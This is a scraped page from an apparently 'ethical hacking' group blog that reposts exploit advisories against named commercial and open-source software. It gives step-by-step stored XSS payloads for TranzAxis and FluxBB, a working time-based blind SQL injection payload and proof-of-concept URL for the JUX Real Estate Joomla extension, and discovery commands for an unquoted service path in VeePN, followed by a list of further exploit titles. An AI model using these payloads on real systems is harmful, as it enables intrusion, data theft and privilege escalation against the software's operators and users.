Exploit Title: TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)
Date: 10th, March, 2025
Exploit Author: ABABANK REDTEAM
Vendor Homepage: https://compassplustechnologies.com/
Version: 3.2.41.10.26
Tested on: Window Server 2016
1. Login to web application
2. Click on `Entire System` goto `Monitoring` then click on `Terminals
Monitoring`
3. Select any name below `Terminals Monitoring` then click on `Open Object
in Tree`
4. Select on Filter then supply with any filter name then click `Apply
Filter`
5. On the right side select on `Save Settings in Explorer Tree`, on the
`Enter Explorer Item Title` supply the payload <img src=x
onerror=alert(document.domain)> then click OK.
Payload: <img src=x onerror=alert(document.domain)>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863107222
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: FluxBB 1.5.11 Stored xss
# Date: 3/8/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: www.fluxbb.org
# Software Link: https://www.softaculous.com/apps/forums/FluxBB
# Version: FluxBB 1.5.11
# Tested on: Windows XP
1. login to admin panel
2. go to /admin_forums.php
3. click on "add forum"
4. in description text area put this payload:
<iframe src=javascript:alert(1)>
5. save changes
now everytime users enter the home page will see the alert.
# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707
# CVE: CVE-2025-2126
# VDB: VDB-299039
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
GET Parameter 'title' is vulnerable to SQLi
---
Parameter: title (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
## POC:
https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]
## Payload:
1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
[-] Done
# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
# Date: 2024-12-27
# Exploit Author: Doğukan Orhan
# Vendor Homepage: https://veepn.com/
# Version: 1.6.1
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
#Service Info
C:\Users\PC>sc qc VeePNService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeePNService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VeePNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

Gitea 1.24.0 - HTML Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jasmin Ransomware - SQL Injection Login Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

TeamPass 3.0.0.21 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

MoziloCMS 3.0 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

YesWiki 4.5.1 - Unauthenticated Path Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

XWiki Platform 15.10.10 - Remote Code Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

UNA CMS 14.0.0-RC - PHP Object Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Microsoft Windows - NTLM Hash Leak Malicious Windows Theme
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views

NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 2 views

Watcharr 1.43.0 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Apache Tomcat 11.0.3 - Remote Code Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Jasmin Ransomware - Arbitrary File Download (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view